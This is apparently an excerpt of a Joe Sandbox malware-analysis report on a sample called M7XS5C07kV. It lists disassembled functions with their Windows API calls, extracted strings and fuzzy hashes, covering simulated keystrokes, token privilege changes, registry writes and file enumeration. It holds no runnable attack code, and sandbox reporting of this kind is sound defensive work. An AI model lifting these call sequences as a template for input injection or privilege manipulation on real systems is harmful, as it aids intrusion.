Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 5b826d4dfc12fb3dc1fce8dafe721903b7a28a929fc28ddaa945ed95806b5de0
Instruction ID: 17a4ce4186db578e365c487ae50c0be5b9f1ed818569a786f0cc542253fa86c0
Opcode Fuzzy Hash: 5b826d4dfc12fb3dc1fce8dafe721903b7a28a929fc28ddaa945ed95806b5de0
Instruction Fuzzy Hash: EFD0C77464030CBFE710DB80DC46FAA777DD705711F100194FD0497290D6B27D508795

Function 005F525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 005F5266

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 62822d0f068788e3e5f00a05f2157b28e40a35cb7cc9eb996315ba97b07a2734
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 0DB0927A44020C77CE012A92FC02A593F19AB81764F408020FB0C18162A677A6649A89

Function 0063D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 0063D1FF

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: eabf47ecf8168c1294a67daf7f741400050d5fadd49be0f4e430c99dae573f0a
Instruction ID: 140a96b3791848db871b4106540468f95b5dce63014c10e96bfa31a4358d64a0
Opcode Fuzzy Hash: eabf47ecf8168c1294a67daf7f741400050d5fadd49be0f4e430c99dae573f0a
Instruction Fuzzy Hash: 7C7173306043028FC714EF28D495AAEBBE1FF89314F04456EF996973A1DB30E945CB92

Function 00F25300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00F25311

Memory Dump Source

Source File: 00000000.00000002.1456569915.0000000000F23000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F23000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f23000_M7XS5C07kV.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: b40803b7b2e3059dcee274e26c09fb1ed44b84ab58f5614966c388e5680a870c
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: FFE0E67494010DEFDB00EFB4D94969E7FB4EF04701F100161FD01D2280D6709D509A62

Non-executed Functions

Function 0065CABC Relevance: 77.6, APIs: 40, Strings: 4, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 005D2612: GetWindowLongW.USER32(?,000000EB), ref: 005D2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0065CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0065CB95
GetWindowLongW.USER32(?,000000F0), ref: 0065CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0065CC00
SendMessageW.USER32 ref: 0065CC29
_wcsncpy.LIBCMT ref: 0065CC95
GetKeyState.USER32(00000011), ref: 0065CCB6
GetKeyState.USER32(00000009), ref: 0065CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0065CCD9
GetKeyState.USER32(00000010), ref: 0065CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0065CD0C
SendMessageW.USER32 ref: 0065CD33
SendMessageW.USER32(?,00001030,?,0065B348), ref: 0065CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0065CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0065CE60
SetCapture.USER32(?), ref: 0065CE69
ClientToScreen.USER32(?,?), ref: 0065CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0065CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0065CEF5
ReleaseCapture.USER32 ref: 0065CF00
GetCursorPos.USER32(?), ref: 0065CF3A
ScreenToClient.USER32(?,?), ref: 0065CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0065CFA3
SendMessageW.USER32 ref: 0065CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0065D00E
SendMessageW.USER32 ref: 0065D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0065D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0065D06D
GetCursorPos.USER32(?), ref: 0065D08D
ScreenToClient.USER32(?,?), ref: 0065D09A
GetParent.USER32(?), ref: 0065D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0065D123
SendMessageW.USER32 ref: 0065D154
ClientToScreen.USER32(?,?), ref: 0065D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0065D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0065D20C
SendMessageW.USER32 ref: 0065D22F
ClientToScreen.USER32(?,?), ref: 0065D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0065D2B5

Part of subcall function 005D25DB: GetWindowLongW.USER32(?,000000EB), ref: 005D25EC

GetWindowLongW.USER32(?,000000F0), ref: 0065D351

Strings

F, xrefs: 0065D235
P[, xrefs: 0065CC5F, 0065CDBA, 0065CDDD, 0065CE0F, 0065CF5F, 0065D0E0, 0065D18C, 0065D1BC, 0065D25F, 0065D28B, 0065D2DB, 0065D33E, 0065D362, 0065D38C
@GUI_DRAGID, xrefs: 0065CE9C
pbi, xrefs: 0065CEAF

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$P[$pbi
API String ID: 3977979337-2704726545
Opcode ID: 4e6ed26523065d74d87ef9a5c8bab9ce94372dcdb46bce452c0ce6695bc62898
Instruction ID: d9bf8ace2dac5679371adef3bdfd088786aa80cf3bc92fd7c42e6c83e0006a1f
Opcode Fuzzy Hash: 4e6ed26523065d74d87ef9a5c8bab9ce94372dcdb46bce452c0ce6695bc62898
Instruction Fuzzy Hash: 6342AD74204341AFDB21CF28CC49AAABBE6FF49322F14051AF996873B0C731D949DB52

Function 005E6F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005E71C3
_memset.LIBCMT ref: 005E7539
_memmove.LIBCMT ref: 005E76AC

Strings

3c^, xrefs: 006223A0
[:>:]], xrefs: 005E7492
_^, xrefs: 006223CB
[:<:]], xrefs: 005E7479
Q\E, xrefs: 005E7FCB
P\h, xrefs: 00621AB8
\b(?=\w), xrefs: 00623769
\b(?<=\w), xrefs: 00623773
]h, xrefs: 00621A22
DEFINE, xrefs: 00622103

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]h$3c^$DEFINE$P\h$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_^
API String ID: 1357608183-1960083417
Opcode ID: 6cec9e9ab852060852185d89103defaa5bf2772a21685ea48e83cc8d73b21e58
Instruction ID: 9e07d0447e8598c3a980adae539a98dcd73b52591e2d3241475794ff95337be2
Opcode Fuzzy Hash: 6cec9e9ab852060852185d89103defaa5bf2772a21685ea48e83cc8d73b21e58
Instruction Fuzzy Hash: 8A93B571A0462ADBDB28CF58D8917EDB7B2FF48310F24856AD945AB380E7749E81CF40

Function 005D48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 005D48DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0060D665
IsIconic.USER32(?), ref: 0060D66E
ShowWindow.USER32(?,00000009), ref: 0060D67B
SetForegroundWindow.USER32(?), ref: 0060D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0060D69B
GetCurrentThreadId.KERNEL32 ref: 0060D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0060D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0060D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0060D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0060D6CF
SetForegroundWindow.USER32(?), ref: 0060D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0060D6E7
keybd_event.USER32(00000012,00000000), ref: 0060D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0060D6FC
keybd_event.USER32(00000012,00000000), ref: 0060D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0060D70A
keybd_event.USER32(00000012,00000000), ref: 0060D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0060D719
keybd_event.USER32(00000012,00000000), ref: 0060D71E
SetForegroundWindow.USER32(?), ref: 0060D721
AttachThreadInput.USER32(?,?,00000000), ref: 0060D748

Strings

Shell_TrayWnd, xrefs: 0060D660

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 1f0c3ae5cc3418842c1d6ea00dcf258e9a3dca7dbcc5641db52b53fe1d41bd56
Instruction ID: 031afe60cd971676c7cd1997d13f812ee26466d11c5a9811a6279d3672123ad5
Opcode Fuzzy Hash: 1f0c3ae5cc3418842c1d6ea00dcf258e9a3dca7dbcc5641db52b53fe1d41bd56
Instruction Fuzzy Hash: 92319471A80318BBEB206FA19C49FBF7F6EEB44B51F104025FA04EB1D1D6B05D01ABA1

Function 00628310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 006287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0062882B
Part of subcall function 006287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00628858
Part of subcall function 006287E1: GetLastError.KERNEL32 ref: 00628865

_memset.LIBCMT ref: 00628353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006283A5
CloseHandle.KERNEL32(?), ref: 006283B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006283CD
GetProcessWindowStation.USER32 ref: 006283E6
SetProcessWindowStation.USER32(00000000), ref: 006283F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0062840A

Part of subcall function 006281CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00628309), ref: 006281E0
Part of subcall function 006281CB: CloseHandle.KERNEL32(?,?,00628309), ref: 006281F2

Strings

default, xrefs: 00628405
, xrefs: 00628362
winsta0, xrefs: 006283C8

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 8083408706ecdf1b68380b33e969efaed15bffba889867b0bc7867a6a849f507
Instruction ID: a7f348efe67c760aac94b657c34b1f3e97c2354dc9f0bc33355507c78bb3867b
Opcode Fuzzy Hash: 8083408706ecdf1b68380b33e969efaed15bffba889867b0bc7867a6a849f507
Instruction Fuzzy Hash: 258159B1902619AFDF51DFA4EC49AEE7BBAAF04304F144169F910B72A1DB358A14DF20

Function 0063C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0063C78D
FindClose.KERNEL32(00000000), ref: 0063C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0063C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0063C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 0063C844
__swprintf.LIBCMT ref: 0063C890
__swprintf.LIBCMT ref: 0063C8D3

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

__swprintf.LIBCMT ref: 0063C927

Part of subcall function 005F3698: __woutput_l.LIBCMT ref: 005F36F1

__swprintf.LIBCMT ref: 0063C975

Part of subcall function 005F3698: __flsbuf.LIBCMT ref: 005F3713
Part of subcall function 005F3698: __flsbuf.LIBCMT ref: 005F372B

__swprintf.LIBCMT ref: 0063C9C4
__swprintf.LIBCMT ref: 0063CA13
__swprintf.LIBCMT ref: 0063CA62

Strings

%02d, xrefs: 0063C91B, 0063C925, 0063C973, 0063C9C2, 0063CA11, 0063CA60
%4d%02d%02d%02d%02d%02d, xrefs: 0063C88A
%4d, xrefs: 0063C8CD

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 30b2e6181dfc182ac85cb1cebfbb9fd3ecbde0116a85f3c70dfffad1cf7de53d
Instruction ID: baba0528b2ec2c267cac0f02afba3f5cf6d1f80106036245653b348f957fe7a6
Opcode Fuzzy Hash: 30b2e6181dfc182ac85cb1cebfbb9fd3ecbde0116a85f3c70dfffad1cf7de53d
Instruction Fuzzy Hash: A4A1FDB1408345ABD710EB98C889DAFBBEDFFD4704F40091BF595D6291EA34DA48CB62

Function 0063EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0063EFB6
_wcscmp.LIBCMT ref: 0063EFCB
_wcscmp.LIBCMT ref: 0063EFE2
GetFileAttributesW.KERNEL32(?), ref: 0063EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 0063F00E
FindNextFileW.KERNEL32(00000000,?), ref: 0063F026
FindClose.KERNEL32(00000000), ref: 0063F031
FindFirstFileW.KERNEL32(*.*,?), ref: 0063F04D
_wcscmp.LIBCMT ref: 0063F074
_wcscmp.LIBCMT ref: 0063F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 0063F09D
SetCurrentDirectoryW.KERNEL32(00688920), ref: 0063F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 0063F0C5
FindClose.KERNEL32(00000000), ref: 0063F0D2
FindClose.KERNEL32(00000000), ref: 0063F0E4

Strings

*.*, xrefs: 0063F048

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 466613591132da6ca39424c9994c3d8da23dfbfa72aa96ecdc717868f2151149
Instruction ID: 321b73f2b2052523f69cb720b9dd70c4325862b150a26f9d807aca551eb62710
Opcode Fuzzy Hash: 466613591132da6ca39424c9994c3d8da23dfbfa72aa96ecdc717868f2151149
Instruction Fuzzy Hash: BD31E7729002096ADF14EBB8DC58AEE77AE9F48361F100176F914D31A1DB74DE44CBA1

Function 00650857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00650953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0065F910,00000000,?,00000000,?,?), ref: 006509C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00650A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00650A92
RegCloseKey.ADVAPI32(?), ref: 00650DB2
RegCloseKey.ADVAPI32(00000000), ref: 00650DBF

Strings

REG_MULTI_SZ, xrefs: 00650B7A
REG_BINARY, xrefs: 00650D4D
REG_QWORD, xrefs: 00650D00
REG_EXPAND_SZ, xrefs: 00650A2F
REG_SZ, xrefs: 00650AD0
REG_DWORD, xrefs: 00650C83

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 37f271d2b3c3c6df1a65269632060d0a2f3cea64f4e3e0fb4d642b550638ac88
Instruction ID: bbfa7c4a9891b23e6dcb975e1410e480637e77447dc1722f4ee87bced5e7ff79
Opcode Fuzzy Hash: 37f271d2b3c3c6df1a65269632060d0a2f3cea64f4e3e0fb4d642b550638ac88
Instruction Fuzzy Hash: D5027C756006029FDB14EF18C855E2ABBE6FF89714F04855EF9899B3A2DB30EC45CB81

Function 005E66E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

3c^, xrefs: 005E68FF
UCP), xrefs: 0062110D
_^, xrefs: 00621465, 0062150C, 006215B4
ANYCRLF), xrefs: 006212FB
NO_AUTO_POSSESS), xrefs: 0062112E
BSR_UNICODE), xrefs: 00621338
BSR_ANYCRLF), xrefs: 0062131E
0Eg, xrefs: 005E673D
0Dg, xrefs: 005E6733
LIMIT_RECURSION=, xrefs: 006211FC
0Fg, xrefs: 005E6747
ANY), xrefs: 006212DE
LIMIT_MATCH=, xrefs: 00621170
pGg, xrefs: 005E6751
UTF), xrefs: 006210FA
CRLF), xrefs: 006212C1
UTF16), xrefs: 006210CF
NO_START_OPT), xrefs: 0062114F
LF), xrefs: 006212A4
CR), xrefs: 00621287

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID: 0Dg$0Eg$0Fg$3c^$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGg$_^
API String ID: 0-3780254454
Opcode ID: 48d7e6cb4d78376a4087211f3a12c49759d20cbbccd322b198197f9d8c399edd
Instruction ID: e6f847ca8039ba4345ab65cdd9a1441e27a39591a53a812d25c0cef430231eda
Opcode Fuzzy Hash: 48d7e6cb4d78376a4087211f3a12c49759d20cbbccd322b198197f9d8c399edd
Instruction Fuzzy Hash: BF727071E04669DBDB18CF59D8407AEBBB6FF55350F14816AE849EB280DB309E81CF90

Function 0063F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0063F113
_wcscmp.LIBCMT ref: 0063F128
_wcscmp.LIBCMT ref: 0063F13F

Part of subcall function 00634385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006343A0

FindNextFileW.KERNEL32(00000000,?), ref: 0063F16E
FindClose.KERNEL32(00000000), ref: 0063F179
FindFirstFileW.KERNEL32(*.*,?), ref: 0063F195
_wcscmp.LIBCMT ref: 0063F1BC
_wcscmp.LIBCMT ref: 0063F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 0063F1E5
SetCurrentDirectoryW.KERNEL32(00688920), ref: 0063F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 0063F20D
FindClose.KERNEL32(00000000), ref: 0063F21A
FindClose.KERNEL32(00000000), ref: 0063F22C

Strings

*.*, xrefs: 0063F190

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: aa64d1d119c5bd55ac59e75580128e4d81612ab2d15bbc452e4f0a4a9475a593
Instruction ID: 667049c1dd53685b6dbca590969a0583269d644b76f3a1ad81f70d43fbe82f12
Opcode Fuzzy Hash: aa64d1d119c5bd55ac59e75580128e4d81612ab2d15bbc452e4f0a4a9475a593
Instruction Fuzzy Hash: 6E31F57690021ABADF10EBA4EC59EEF77AE9F85320F100175E900E31A0DB71DF45CA94

Function 0063A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0063A20F
__swprintf.LIBCMT ref: 0063A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 0063A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0063A293
_memset.LIBCMT ref: 0063A2B2
_wcsncpy.LIBCMT ref: 0063A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0063A323
CloseHandle.KERNEL32(00000000), ref: 0063A32E
RemoveDirectoryW.KERNEL32(?), ref: 0063A337
CloseHandle.KERNEL32(00000000), ref: 0063A341

Strings

:, xrefs: 0063A252
\??\%s, xrefs: 0063A22B
\, xrefs: 0063A247

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

